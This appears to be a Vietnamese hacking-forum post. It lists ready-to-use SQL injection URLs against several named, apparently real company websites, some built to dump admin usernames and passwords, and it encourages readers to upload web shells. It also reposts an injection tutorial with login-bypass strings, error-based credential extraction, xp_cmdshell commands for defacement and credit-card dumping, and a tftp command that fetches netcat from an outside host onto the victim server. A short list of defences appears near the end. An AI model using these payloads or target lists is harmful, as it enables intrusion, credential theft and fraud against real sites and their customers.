http://samcuhanquoc.com.vn/index.php?aacecom=articles&act=list&cid=-203%20union%20select%20%20group_concat%28username,0x3a,password%29,2%20from%20admin--
http://samcuhanquoc.com.vn/admin
http://www.nhomkinhhungvinh.com.vn/index.php?aacecom=articles&act=list&cid=-199%20union%20select%201,2--
http://samcuhanquoc.com.vn/admin/
http://www.khoinguyen.com.vn/index.php?aacecom=articles&act=detail&id=29&cid=-148union select 1,2 from admin--
http://www.khoinguyen.com.vn/admin.php
cái ni khác số 1 và 2 nha.
http://www.thepavillons.com.vn/index.php?aacecom=intro&act=detail&cid=-165%20union%20select%201,2--
http://www.tinvietgroup.com.vn/index.php?aacecom=articles&act=detail&id=645&cid=-241%20union%20select%201,2--
site này k bình thuogwf, cẩn thận nguy hiểm
http://www.petrohoangmy.com/index.php?aacecom=articles&act=list&cid=-221%20union%20select%201,2--
http://www.haipacbd.com/index.php?aacecom=articles&act=detail&id=56&cid=-155%20union%20select%201,2--
cái ni cơ bản nên anh em pro đừng chém, anh em up shell lên là chính, chứ khai thác một phiên bản thì dùng một cái cũng đi được cái thứ 2, ai thấy có ích thì thanks nha,
ps: lỗi này có bạn post nhưng k nói các link khai thác
các bạn nhìn số hiển thị để khai thác
VD: http://www.haipacbd.com/index.php?aacecom=articles&act=detail&id=56&cid=-155%20union%20select%201,2--
số 1
READMORE
Cơ sở dữ liệu là trái tim của một website thương mại. Một cuộc tấn công vào server lưu giữ CSDL có thể gây ra thất thoát lớn về tài chính cho công ty. Thông thường CSDL bị hack để lấy các thông tin về thẻ tín dụng. Chỉ cần một cuộc tấn công sẽ làm giảm uy tín và lượng khách hàng bởi vì họ muốn thông tin về CC của mình được an toàn. Hầu hết các website thương mại dùng Microsoft SQL (MSSql) và Oracle. MSSQL vẫn đang chiếm ưu thế trên thị trường vì giá thành rẻ. Trong khi Oracle server được bán mắc hơn. Oracle đã từng tuyên bố là "không thể xâm nhập được", nhưng những hacker coi đó như là 1 lời thách thức và đã tìm ra rất nhiều lỗi trong Oracle server..
Bài viết được chia làm 2 phần
1. Dùng HTTP cổng 80
2. Dùng MS SQL cổng 1434
Phần 1 - Dùng cổng 80 HTTP
----------------------------------------------------------------
Kiến thức trong phần này hữu ích không chỉ đối với các hacker mà còn với những người thiết kế web. Chỉ cần một lỗi thông thường tạo ra bởi người thiết kế web có thể làm lộ thông tin về CSDL của server cho hacker. Toàn bộ mục đích của trò chơi là các chuỗi truy vấn. Người đọc coi như có kiến thức về các truy vấn và ngôn ngữ asp ( active server pages ). Thêm nữa là cách tấn công này thường chỉ cần dùng bằng 1 trình duyệt internet. Vì vậy bạn không cần bất cứ một tool nào ngoại trừ IE hay Netscape.
Thông thường, để làm 1 trang đăng nhập, người thiết kế web sẽ viết 1 đoạn mã như sau:
login.htm
<html>
<body>
<form method=get action="logincheck.asp">
<input type="text" name="login_name">
<input type="text" name="pass">
<input type="submit" value="sign in">
</form>
</body>
</html>
File logincheck.asp nằm trên server dùng để kiểm tra thông tin do user nhập vào có nội dung:
logincheck.asp
<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")
set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLED B.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>
Thoạt tiên đoạn code trên có vẻ ổn. 1 người dùng type username và pass trong trang login.htm và click 'Submit'. Giá trị được type vào sẽ được browser chuyển về cho logincheck.asp kiểm tra bằng cách dùng câu truy vấn "Select * from table1 where login='"&log& "' and password='" &pwd& "' ".
Mọi thứ có vẻ OK ? Chuỗi truy vấn cũng OK. Nhưng nếu 1 trang login được làm như thế thì 1 hacker sẽ có thể dễ dàng đăng nhập mà không cần một password hợp lệ nào đó. Nhìn lại chuỗi truy vấn:
"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
Nếu 1 user type tên đăng nhập là "hack" và mật khẩu là "passne" thì những giá trị này sẽ được chuyển cho trang asp với method "POST" và câu truy vấn trên trở thành:
"Select * from table1 where login=' hack' and password=' passne ' "
Tốt. Nếu như có 1 dòng chứ login name "hack" và password "passne" trong CSDL thì chúng ta sẽ nhận được thông báo đăng nhập thành công. Nhưng nếu như type loginname là "hack" và password là hi' or 'a'='a' trong phần password ? Câu truy vấn sẽ trở thành:
"Select * from table1 where login=' hack' and password=' hi' or 'a'='a ' "
Click 'Submit' và Bingo, đăng nhập thành công. Chuỗi truy cập được thoả mãn khi điều kiện là password bằng 'hi' HOẶC 'a'='a'. Điều này luôn đúng và hacker sẽ đăng nhập với nick 'hack'. Có thể thử các chuỗi sau đây trong ô password nếu cách trên không làm được với một số website:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Dấu -- được thêm vào làm cho phần còn lại của chuỗi truy vấn trở thành 'chú thích' nên các điều kiện khác sẽ không bị kiểm tra. Tương tự có thể dùng:
hack' --
hack" --
hoặc những username khác và chọn lựa password bất kỳ để có thể đăng nhập được. Bởi vì trong câu truy vấn chỉ có phần username được kiểm tra là 'hack' và phần còn lại bị bỏ đi do có dấu -- . Nếu may mắn gặp được vào những website mà người thiết kế web đã mắc những lỗi trên, và bạn có thể login với bất kỳ username nào.
Cách tấn công cao cấp hơn: dùng các thông báo lỗi của ODBC
--------------------------------------------------------------
Theo trên ta có thể thấy cách login mà không cần phải biết bất cứ 1 password nào. Dưới đây là cách để đọc toàn bộ CSDL chỉ bằng cách dùng các truy vấn trong URL. Cách này chỉ thực hiện được đối với IIS servers, nghĩa là với các trang asp. Và IIS được sử dụng trong gần 35% các ứng dụng thương mại web. Vì vậy chắc chắn bạn sẽ tìm ra 1 nạn nhân sau khi chỉ search một vài website. Thí dụ như:
http://www.nosecurity.com/mypage.asp?id=45
trong URL, dấu '?' cho thấy đằng sau nó, giá trị 45 sẽ được chuyển cho 1 thông số ẩn. Chúng ta hãy xem lại ví dụ trên, trang login.htm có 2 form input dạng text tên là 'login_name' và 'pass', và các giá trị của 2 form này sẽ được chuyển cho logincheck.asp
Việc đăng nhập thành công cũng có thể thực hiện bằng cách mở trực tiếp trang logincheck.asp bằng cách dùng link:http://www.nosecurity.com/loginchec...ack&pass=passne nếu method là GET thay vì POST ( save html lại và sửa POST bằng GET )
Lưu ý: sự khác nhau giữa GET và POST là POST sẽ không hiện ra các giá trị được chuyển sang trang sau trên URL trong khi GET làm hiện lên các giá trị này. Để biết thêm về GET và POST nên đọc thêm RFC 1945 và 2616 trong giao thức HTTP
Sau dấu '?' thì các biến được dùng trong trang logincheck.asp sẽ được gán bằng giá trị hacker type vào. Trong URL trên thì login_name sẽ được gán với giá trị hack. Các giá trị khác nhau được ngăn cách bởi dấu '&'
Quay trở lại trang index.htm, biến id có thuộc tính ẩn và tuỳ theo những link người dùng click, giá trị của id sẽ thay đổi. Giá trị này sẽ được chuyển vào trong câu truy vấn mypage.asp và user sẽ được trả về trang mình muốn. Ứng với giá trị của 'id' là 46 sẽ có một trang khác.
Chúng ta bắt đầu hack: type thêm vào trên URL câu truy vấn sau:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
information_schema.tables là một table hệ thống chứa thông tin về tất cả table của server. Trong đó có một field table_name chứa tất cả tên của các table. Chuỗi query SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES trả về giá trị là tên của table đầu tiên với kiểu string (nvarchar) trong INFORMATION_SCHEMA.TABLES, và chúng ta lại gộp nó 45 là một giá trị số. Vì vậy server sẽ thông báo lỗi:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line
Trong thông báo lỗi trên ta nhận được một table là 'logintable'. Table này có thể chứa tên truy cập và password của các user. Tiếp tục type câu lệnh sau lên URL:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
Tương tự table_name, column_name cũng là 1 field trong table hệ thống INFORMATION_SCHEMA.COLUMNS chứa tất cả tên các column. Và ta đang gộp tên của column đầu tiên trong table 'logintable' với giá trị 45, nên sẽ có thông báo lỗi:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. /index.asp, line 5
Thông báo lỗi cho thấy column đầu tiên trong 'logintable' là 'login_id', để lấy tên của column thứ 2:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5
Chúng ta có thêm 1 column nữa là 'login_name', tiếp tục lấy column thứ 3
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'passwd' to a column of data type int. /index.asp, line 5
Đây là thông tin ta cần có: password login. Bước kế tiếp là lấy thông tin login và password từ table 'logintable', type;
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Rahul' to a column of data type int. /index.asp, line 5
Đây rồi: 1 trong những login name là 'Rahul', câu lệnh lấy password của user Rahul sẽ là:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'P455w0rd' to a column of data type int. /index.asp, line 5
OK, tên truy cập : Rahul và mật khẩu là p455w0rd. Ta đã crack được CSDL củawww.nosecurity.com. Và điều này nhờ vào server đã không lọc dữ liệu truy vấn của người dùng. Lỗi SQL này vẫn còn gặp ở nhiều website, và phương pháp phòng chống tốt nhất là phân tích những request của user và lọc đi các ký tự như ', ", --, : ....
Phần 2: dùng cổng 1434 ( cổng giao tiếp SQL )
------------------------------------------------------
Chúng ta đã thấy cách làm thế nào để xâm nhập vào CSDL bằng cách dùng các malformed URL và chỉ bằng cổng 80 ( cổng http ). Sau đây ta sẽ hack database dùng port 1434. Trước khi hack chúng ta nên biết thật sự các database server là gì và hoạt động như thế nào, cùng với cách khai thác chúng.
Những người thiết kết MS SQL tạo ra một số thủ tục mặc định được lưu sẵn chung với sản phẩm của mình để giúp cho webdesigner linh động hơn. Các thủ tục này không có gì khác mà chính là các lớp hàm, được dùng để thực hiện những nhiệm vụ nào đó dựa trên các biến được truyền cho chúng. Chính những thủ tục này rất quan trọng đối với hacker, 1 số trong đó gồm:
sp_passsword -> đổi password cho 1 tên truy cập (login name) nào đó
VD: EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’
sp_tables -> hiển thị tất cả table trong database hiện tại
VD: EXEC sp_tables
xp_cmdshell -> cho phép chạy câu lệnh bất kỳ lền server với quyền admin của database ( cái này quan trọng nhất, vì thông thường database được cài mặc định với quyền root )
xp_msver -> hiển thị version của SQL server và tất cả thông tin về HĐH được sử dụng.
xp_regdeletekey -> xoá một key trong registry của windows
xp_regdeletevalue -> xoá một giá trị trong registry
xp_regread -> in 1 giá trị trong registry lên màn hình
xp_regwrite -> gán 1 giá trị mới cho 1 key
xp_terminate_process -> ngừng một process nào đó
Đây là một số các lệnh quan trọng. Thật ra có hơn 50 loại thủ tục như thế. Nếu muốn database được an toàn thì điều nên làm là xoá tất cả những thủ tục đó đi bằng cách mở Master database dùng chương trình MS SQL Server Enterprise Manager. Mở folder Extended Stored Procedures và xoá các thủ tục lưu trong đó bằng cách nhấn chuột phải và chọn delete
Lưu ý:"Master" là một database quan trọng của SQLchứa tất cả thông tin về hệ thống như là login name và các thủ tục có sẵn. Nếu 1 hacker xoá master database thì SQL server sẽ bị down vĩnh viễn. Ngoài "Master" db ra còn có "Syslogins" là table hệ thống mặc định chứ tất cả username và password để login vào db ( user của db khác user của ứng dụng web ). Điều nguy hiểm nhất trong MS SQL là MS SQL mặc định có một user là "sa" với password "" ( không có pass )
Tiếp theo là cách hack db. Đầu tiên ta cần tìm ra một server bị lỗi. Download 1 chương trình scan port và scan 1 dãy ip để tìm ip có port 1433 hoặc 1434 ( tcp hay udp ) mở. Đây là port dùng bởi MS SQL server. Ngoài ra port của Oracle server là 1512. VD như chúng ta tìm được một server có ip là 198.188.178.1, có rất nhiều cách để dùng các dịch vụ của SQL như là dùng telnet hoặc netcat tới port 1433/1434. Ngoài ra có thể dùng một tool tên là osql.exe được kèm theo với các SQL server 2000. Mở DOS prompt và type vào:
Cosql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
<EOF> batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]
Đây là help file cho osql. Tiếp tục:
C:\> osql.exe –S 198.188.178.1 –U sa –P “”
Nếu chung ta nhận được dấu nhắc
1>
có nghĩa là login thành công, nếu không sẽ có thông báo lỗi login sai đối với user "sa"
Tới đây nếu ta muốn chạy bất kỳ câu lệnh nào đó lên server, chỉ cần dùng thủ tục "xp_cmdshell" như sau:
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”
Tôi khuyến khích việc dùng -Q thay vì -q bởi vì chúng ta sẽ exit khỏi server ngay sau khi câu lệnh được thực hiện. Tương tự ta có thể chạy bất cứ một câu lệnh nào lên server. Một hacker thông minh còn có thể install backdoor nhằm để tiếp tục access vào server sau này. Ta cũng có thể dùng “information_schema.tables” để lấy list các tables và nội dung của chúng bằng cách:
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”
Kiếm thông tin login trong các table như login, accounts, users ...
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”
và lấy thông tin về username cùng với credit card.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”
Output:
Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000
Có thể deface website bằng cách chạy lệnh sau ( chỉ trong trường hợp database server được install chung với webserver )
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by hack> C:\inetpub\wwwroot\index.html’”
Upload file lên server dùng tftp:
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”
Để download một file nào đó ta có thể dùng lệnh PUT thay vì GET, bởi vì các câu lệnh này sẽ được thực hiện trên server chứ không fải ở máy chúng ta. Nếu ta dùng GET, câu lệnh sẽ thực hiện trên server và sẽ download nc.exe từ máy của chúng ta tới server.
Tools dùng hack các SQL pass có rất nhiều trên web. Ngay cả lỗi tràn bộ đệm cũng có thể được dùng để điêu khiển hoàn toàn một hệ thống với quyền admin. Bài viết này chỉ đề cập một số vấn đề tổng quát về db server.
• Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.
Phương pháp phòng chống
---------------------------
<*> Đổi password mặc định của user "sa"
<*> Xoá tất cả các thủ tục được mặc định lưu trữ trên server
<*> Lọc những ký tự như ',",--,: ...
<*> Update SQL với những bản mới nhất
<*> Khoá các port SQL bằng cách dùng firewall
Một số website về SQL security"
http://sqlsecurity.com/
http://www.cert.com/
Any comments and good criticism is always accepted at guatehack@linuxmail.org
[End of Original Message]
1. Một số password default cho các super-user:
Oracle sys: oracle
mySQL (Windows) root:null
MS SQL Server sa:null
DB2 dlfm:ibmdb2
2. Collection các tool dùng cho SQL:
SQLTools.zip ---------> www.lebuudan.net/SQLTools.zip
Bao gồm:
SQLcracker + passlist + userlist
SQLdos.exe
SQLscanner.exe
SQLping.exe
and more.
3.OSQL.exe nằm trong bộ MSDE của microsoft, nhưng tới 64Mb lận, có ai cần thì tui upload lên. Hông thì thui, host nhỏ xíu hà.
4. ebook/text :
ebook: http://www.hackersplayground.org/books.html
text: http://www.hackersplayground.org/papers.html
SQLinjection: http://www.hackersplayground.org/papers.html
dùng chung một em source nên .....anh em đừng chém, vẫn còn bảng INFORMATION_SCHEMA.COLUMNS nên anh em từ từ khai thác.
tham khảo thêm :http://www.hvaonline.net/hvaonline/posts/list/10020.hva
http://samcuhanquoc.com.vn/index.php?aacecom=articles&act=list&cid=-203%20union%20select%201,2--
http://samcuhanquoc.com.vn/index.php?aacecom=articles&act=list&cid=-203%20union%20select%20%20group_concat%28username,0x3a,password%29,2%20from%20admin--
http://samcuhanquoc.com.vn/admin
http://www.nhomkinhhungvinh.com.vn/index.php?aacecom=articles&act=list&cid=-199%20union%20select%201,2--
http://samcuhanquoc.com.vn/admin/
http://www.khoinguyen.com.vn/index.php?aacecom=articles&act=detail&id=29&cid=-148union select 1,2 from admin--
http://www.khoinguyen.com.vn/admin.php
cái ni khác số 1 và 2 nha.
http://www.thepavillons.com.vn/index.php?aacecom=intro&act=detail&cid=-165%20union%20select%201,2--
http://www.tinvietgroup.com.vn/index.php?aacecom=articles&act=detail&id=645&cid=-241%20union%20select%201,2--
site này k bình thuogwf, cẩn thận nguy hiểm
http://www.petrohoangmy.com/index.php?aacecom=articles&act=list&cid=-221%20union%20select%201,2--
http://www.haipacbd.com/index.php?aacecom=articles&act=detail&id=56&cid=-155%20union%20select%201,2--
cái ni cơ bản nên anh em pro đừng chém, anh em up shell lên là chính, chứ khai thác một phiên bản thì dùng một cái cũng đi được cái thứ 2, ai thấy có ích thì thanks nha,
ps: lỗi này có bạn post nhưng k nói các link khai thác
các bạn nhìn số hiển thị để khai thác
VD: http://www.haipacbd.com/index.php?aacecom=articles&act=detail&id=56&cid=-155%20union%20select%201,2--
số 1
